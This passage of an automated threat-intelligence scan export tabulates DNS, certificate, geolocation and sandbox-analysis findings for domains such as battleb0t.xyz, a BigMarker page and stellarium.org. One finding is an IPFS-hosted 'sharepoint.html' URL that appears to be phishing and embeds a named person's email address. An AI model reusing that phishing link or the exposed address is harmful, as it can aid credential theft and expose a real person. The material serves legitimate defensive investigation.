"IsoScope_ff8_IE_EarlyTabStart_0xccc_Mutex"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_ff8_IESQMMUTEX_0_519"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_ff8_IESQMMUTEX_0_303"\n "IsoScope_ff8_IESQMMUTEX_0_331"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4088"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"209.94.90.1:443"\n "185.199.108.153:443"\n "69.16.175.42:443"\n "52.155.62.95:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.link"\n "code.jquery.com"\n "lipis.github.io"\n "query.prod.cms.msn.com"\n "teredo.ipv6.microsoft.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ".fa-twitter-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-twitter:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-square:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-youtube-play:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")\n Found string ".fa-cc-paypal:before {" (Indicator: "dir "; File: "font-awesome_1_.css")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" reads file "c:\\program files\\internet explorer\\iexplore.exe"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df220c6963395ab279.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{eb5e3e79-eb33-11ed-90db-080027f80375}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df03903f02ca632e35.tmp"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\{eb5e3e7b-eb33-11ed-90db-080027f80375}.dat"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\roaming\\microsoft\\windows\\cookies\\1hgch0kk.txt"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\37nu00gp\\favicon[3].ico"\n "iexplore.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\windows\\temporary internet files\\content.ie5\\37nu00gp\\favicon[2].ico"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\internet explorer\\recovery\\high\\active\\recoverystore.{eb5e3e79-eb33-11ed-90db-080027f80375}.dat"\n "iexplore.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\temp\\~df220c6963395ab279.tmp"'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "urlref_httpsbafybeifn47jywvhgzpcpcoitg5ftfimcmq6667ul2quva46dfyz3t6u3qq.ipfs.dweb.linksharepoint.html#adeajiboye%40tfl.gov.uk" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "jquery-1.9.1_1_.js" has type "ASCII text"- [targetUID: N/A]\n "fontawesome-webfont_1_.eot" has type "Embedded OpenType (EOT) FontAwesome family"- [targetUID: N/A]\n "CabC98.tmp" has type "data"- Location: [%TEMP%\\CabC98.tmp]- [targetUID: 00000000-00003752]\n "font-awesome_1_.css" has type "troff or preprocessor input ASCII text with very long lines"- [targetUID: N/A]\n "en-US.4" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Internet Explorer\\DomainSuggestions\\en-US.4]- [targetUID: 00000000-00004088]\n "RecoveryStore._88B090C0-D917-11E7-B67B-080027A49DD6_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "~DF220C6963395AB279.TMP" has type "data"- Location: [%TEMP%\\~DF220C6963395AB279.TMP]- [targetUID: 00000000-00004088]\n "~DFD673A39745136900.TMP" has type "data"- Location: [%TEMP%\\~DFD673A39745136900.TMP]- [targetUID: 00000000-00004088]\n "~DF03903F02CA632E35.TMP" has type "data"- Location: [%TEMP%\\~DF03903F02CA632E35.TMP]- [targetUID: 00000000-00004088]\n "~DF4CF5FEB5537E8681.TMP" has type "data"- Location: [%TEMP%\\~DF4CF5FEB5537E8681.TMP]- [targetUID: 00000000-00004088]\n "_EB5E3E7B-EB33-11ED-90DB-080027F80375_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "RecoveryStore._EB5E3E79-EB33-11ED-90DB-080027F80375_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "_F40A39E6-EB33-11ED-90DB-080027F80375_.dat" has type "Composite Document File V2 Document Cannot read section info"- [targetUID: N/A]\n "search__0633EE93-D776-472f-A0FF-E1416B8B2E3A_.ico" has type "MS Windows icon resource - 1 icon 32x32 32 bits/pixel"- [targetUID: N/A]\n "CE6PK5S8.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\CE6PK5S8.txt]- [targetUID: 00000000-00004088]\n "NIMW53JC.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\NIMW53JC.txt]- [targetUID: 00000000-00004088]\n "QCNMHTZN.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\QCNMHTZN.txt]- [targetUID: 00000000-00004088]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\MetaData\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003752]\n "search_2_.json" has type "JSON data"- [targetUID: N/A]\n "BZQCY431.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\BZQCY431.txt]- [targetUID: 00000000-00004088]\n "GWHYI938.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\GWHYI938.txt]- [targetUID: 00000000-00004088]\n "UZP7J6YA.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\UZP7J6YA.txt]- [targetUID: 00000000-00004088]\n "5DVSSG1V.txt" has type "ASCII text"- Location: [%APPDATA%\\Microsoft\\Windows\\Cookies\\5DVSSG1V.txt]- [targetUID: 00000000-00004088]\n "sharepoint_1_.htm" has type "HTML document ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "CabF738.tmp" has type "data"- Location: [%TEMP%\\CabF738.tmp]- [targetUID: 00000000-00003752]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "data"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00003752]\n "CabF749.tmp" has type "data"- Location: [%TEMP%\\CabF749.tmp]- [targetUID: 00000000-000 | 185.199.108.153 |
| 2023-05-12 03:03:26 | Co-Hosted Site - Domain Name | No | DNS Resolver | 0 | 0 | 3 | 0 | None | github.io | 000407.github.io |
| 2023-05-12 03:32:23 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.97.12:80 | 188.114.97.0/24 |
| 2023-05-12 02:51:54 | Raw Data from RIRs | No | Hybrid Analysis | 2 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 23, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=5673cc9137db&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"Local\\SM0:1480:304:WilStaging_02"\n "SM0:1480:304:WilStaging_02"\n "InternetShortcutMutex"\n "SM0:1480:120:WilError_01"\n "Local\\SM0:1480:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.136:443"\n "13.227.21.58:443"\n "13.227.74.64:443"\n "185.199.108.153:443"\n "74.125.137.157:443"\n "142.250.191.68:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-pre-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:title" content="The Inbound Customer Experience">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")\n Found string "<meta name="twitter:description" content="Our panelists will discuss a variety of questions including:" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member"), Found string "<meta name="twitter:image" content="https://d5ln38p3754yc.cloudfront.net/conference_icons/7821611/large/1677693079-c5b46aaa6c8ef248.jpg?1677693079">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Unusual Characteristics', u'origin': u'File/Memory', u'identifier': u'string-23', u'name': u'Detected known bank URL artifact', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'""manitobaharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""highkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""mandalascrubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""primalharvest.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "arvest.com")\n ""amazingclubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""purehockey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""order.firehousesubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""cousinssubs.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "ubs.com")\n ""digikey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""hockeymonkey.com"," (Source: wallet-checkout-eligible-sites-pre-stable.json, Indicator: "key.com")\n ""4amscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""6whiskey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""99centsubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""allieandmickey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""alteregoscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""annabelbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""aspirefashionscrubs.com"," (Source: wallet-pre-stable.json, Indicator: "ubs.com")\n ""augustbleu.com"," (Source: wallet-pre-stable.json, Indicator: "leu.com")\n ""bananasmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")\n ""baseballmonkey.com"," (Source: wallet-pre-stable.json, Indicator: "key.com")'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-243', u'name': u'Read files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1083', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1083', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\index"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_0"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_1"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_2"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\shadercache\\data_3"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\history"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\autofill\\3.0.0.3\\edge_autofill_global_block_list.json"\n "msedge.exe" reads file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\login data"'}, {u'category': u'Installation/Persistence', u'origin': u'API Call', u'identifier': u'api-242', u'name': u'Write files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\site characteristics database\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\edgecoupons\\coupons_data.db\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\sync data\\leveldb\\log"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\7c516a82-27f5-4723-be57-30a8336c14b5.tmp"\n "msedge.exe" writes file "c:\\users\\%osuser%\\appdata\\local\\microsoft\\edge\\user data\\default\\service worker\\database\\log"'}, {u'category': u'Installation/Persistence', u'origin': u'File/Memory', u'identifier': u'string-396', u'name': u'Contains ability to create/modify Windows services (Powershell command string)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1543/003', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1543.003', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'Found string "<div class="registrants-add-contents" style="padding-bottom: 28px">" (Indicator: "Add-Content"; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_5673cc9137db_bmid_type_member")'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"shopping.js" has type "UTF-8 Unicode text with very long lines with CRLF line terminators"- Location: [%TEMP%\\6236_1468670677\\shopping.js]- [targetUID: 00000000-00006236]\n "data_2" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Cache\\Cache_Data\\data_2]- [targetUID: 00000000-00001308]\n "Ruleset Data" has type "data"- Location: [%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Subresource Filter\\Indexed Rules\\35\\scoped_dir6236_1265273683\\Ruleset Data]- [targetUID: 00000000-0000623 | 185.199.108.153 |
| 2023-05-12 02:44:11 | Co-Hosted Site - Domain Name | No | SSL Certificate Analyzer | 2 | 1 | 1 | 0 | None | github.com | battleb0t.xyz |
| 2023-05-12 02:44:05 | SSL Certificate Expiring | Yes | CertSpotter | 0 | 0 | 1 | 0 | None | 2023-05-26 01:39:24 | battleb0t.xyz |
| 2023-05-12 03:09:26 | Co-Hosted Site | No | SSL Certificate Analyzer | 1 | 0 | 2 | 0 | None | cdnjs.cloudflare.com | 188.114.96.1 |
| 2023-05-12 03:09:28 | SSL Certificate - Issued by | No | SSL Certificate Analyzer | 0 | 0 | 2 | 0 | None | C=US,O=Let's Encrypt,CN=R3 | 87.248.157.102 |
| 2023-05-12 02:50:16 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nuke.battleb0t.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:37:68:7b:1f:26:29:cd:a4:cc:95:52:df:e2:0a:12:6f:13
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Feb 13 15:23:51 2023 GMT
Not After : May 14 15:23:50 2023 GMT
Subject: CN=nuke.battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (4096 bit)
Modulus:
00:d9:29:5b:18:4c:1d:e8:59:eb:db:25:91:54:31:
ed:38:23:ab:0a:88:57:5c:ef:0c:7e:ca:ca:6c:71:
0b:02:fd:19:3d:6a:e8:97:28:77:25:12:e6:41:af:
0c:74:de:eb:50:90:97:94:e1:fd:e0:db:78:3a:0a:
5f:ae:54:a8:1f:8e:40:46:da:de:c8:9e:fa:c8:e7:
39:8e:1b:9f:5e:60:ec:47:c4:47:f9:79:27:17:65:
24:54:e3:e9:87:77:9b:2d:fc:59:b6:69:6a:35:59:
71:49:6c:3f:68:b3:6f:f3:47:8d:99:d8:26:4a:34:
e5:bd:98:64:13:9c:bc:2e:32:d9:f1:82:53:39:a9:
0e:5a:3e:f4:44:ad:26:19:df:02:ae:0a:8a:ee:fc:
9b:3e:7d:da:ca:fc:e7:ee:68:4f:c5:8c:ef:dc:74:
06:e9:7a:47:71:5f:53:c7:6d:09:e9:1f:2a:81:e3:
aa:4a:4a:ad:ae:9d:25:b9:f8:c2:d3:14:56:b4:75:
91:e9:be:73:0e:b4:7d:4d:da:64:95:77:6d:43:79:
73:49:a5:8a:21:01:8b:43:f7:7e:6b:34:db:43:cb:
18:86:96:0e:e7:1a:02:5a:4f:df:42:dd:88:c3:61:
4d:6b:c6:c6:bf:25:5b:76:f4:0e:86:dd:ad:d2:26:
a8:0b:2a:9a:7b:42:50:c1:2c:92:f7:92:ae:7c:b1:
d3:11:4f:23:ac:54:f9:9e:aa:91:2b:7c:ed:1c:c1:
46:1b:9b:3c:a0:2a:b1:e3:e2:b9:d0:7f:06:57:c9:
1e:63:2a:89:4d:e0:fc:34:28:ec:5f:72:15:f2:01:
80:22:e3:d2:bf:66:7b:78:f3:2a:37:36:d0:18:e7:
eb:62:58:1a:53:3f:4a:aa:c6:06:93:11:2e:9b:de:
b2:20:c5:30:35:f7:4b:de:99:68:8b:4d:f1:cf:5f:
e0:29:92:a1:d4:25:53:f6:6b:8d:eb:c8:2f:a1:48:
f6:93:3d:2d:29:1c:93:8a:83:6e:a8:d5:40:07:99:
d9:b4:ed:f4:2d:5b:2c:94:69:23:83:3f:eb:1f:20:
45:ea:f5:f6:5a:22:b5:7a:ea:e6:92:ef:69:3a:86:
e9:7d:cc:89:f5:72:d8:75:21:3a:fd:e8:3a:fd:dd:
16:43:3a:20:cf:8c:1c:3f:54:62:be:57:b4:91:f9:
1f:7b:59:bb:69:98:ad:21:46:6b:14:0b:f3:32:e9:
f3:42:4c:fe:3e:ea:f8:50:4d:7c:e3:49:32:31:e8:
73:54:2a:f5:e6:ac:fb:17:66:a1:41:7a:05:04:c9:
53:ab:bd:62:a2:65:3e:e4:d9:bf:f3:5f:60:e6:ba:
3c:1f:a9
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
D9:CF:28:31:E6:B0:52:A6:B3:E5:82:F1:AF:FD:4B:16:99:CF:87:98
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:nuke.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
9d:ff:c4:18:06:c7:30:d4:36:0f:0e:18:02:e1:f1:df:09:d5:
21:48:af:f9:5b:c3:31:1b:5f:2b:b6:70:3d:80:2b:58:d6:6f:
b5:cd:ce:70:10:56:ed:d2:2c:18:4d:d8:55:56:01:67:34:4f:
bc:a8:06:13:c7:63:73:41:9d:bd:7a:2d:d7:ed:6a:95:df:86:
a0:fd:bf:15:00:37:ee:c9:32:cd:29:05:23:5a:30:c7:ce:39:
29:07:6d:b0:2b:6a:1c:81:8f:29:05:30:c4:40:2c:ba:5f:67:
f5:56:a5:86:93:08:a2:16:e7:a9:15:01:13:84:23:08:70:b8:
b0:8e:c4:e6:9c:43:cf:99:85:ea:2e:4c:6c:a4:51:b4:75:a3:
cf:1f:af:40:ab:43:86:65:fb:ba:43:42:24:c7:fd:a0:13:49:
bf:fb:a3:fe:ef:4b:38:f1:34:bd:37:28:78:ae:eb:fe:f8:2c:
4d:b8:bd:50:64:c1:2a:97:b9:ac:34:8d:83:6a:c1:4b:6d:6a:
3a:8c:69:86:1e:d9:d4:69:98:23:cc:ff:1b:aa:4f:58:58:dd:
f4:2d:3e:92:9e:ec:9c:7f:4a:ba:35:54:c6:db:d8:38:08:1a:
75:fe:73:ca:92:d8:db:5e:94:c8:9a:15:84:e4:03:5b:a9:4b:
3c:ac:3c:70
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | Tanuki.pl (Category: hobby)
https://tanuki.pl/profil/login | login |
| 2023-05-12 02:50:28 | Raw Data from RIRs | No | GLEIF | 0 | 0 | 3 | 0 | None | [{u'attributes': {u'highlighting': u'<b>C</b>/O <b>CENTRALNIC</b> <b>LTD</b>', u'value': u'C/O CENTRALNIC LTD'}, u'type': u'autocompletions'}] | (c) CentralNic Ltd |
| 2023-05-12 02:45:06 | Physical Location | No | ipapi.co | 0 | 0 | 2 | 0 | None | San Francisco, California, CA, United States, US | 2606:50c0:8003::153 |
| 2023-05-12 02:46:38 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'http://stellarium.org/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "IsoScope_aec_ConnHashTable<2796>_HashTable_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "IsoScope_aec_IESQMMUTEX_0_331"\n "IsoScope_aec_IESQMMUTEX_0_519"\n "UpdatingNewTabPageData"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2796"\n "IsoScope_aec_IESQMMUTEX_0_303"\n "Local\\ZonesCacheCounterMutex"\n "IsoScope_aec_IE_EarlyTabStart_0xee8_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_2796"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"185.199.111.153:80"\n "142.250.189.168:443"\n "172.67.71.29:443"\n "142.250.189.238:443"\n "142.251.2.155:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-0', u'name': u'Contacts domains', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"stellarium.org"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"stellarium.org"'}, {u'category': u'General', 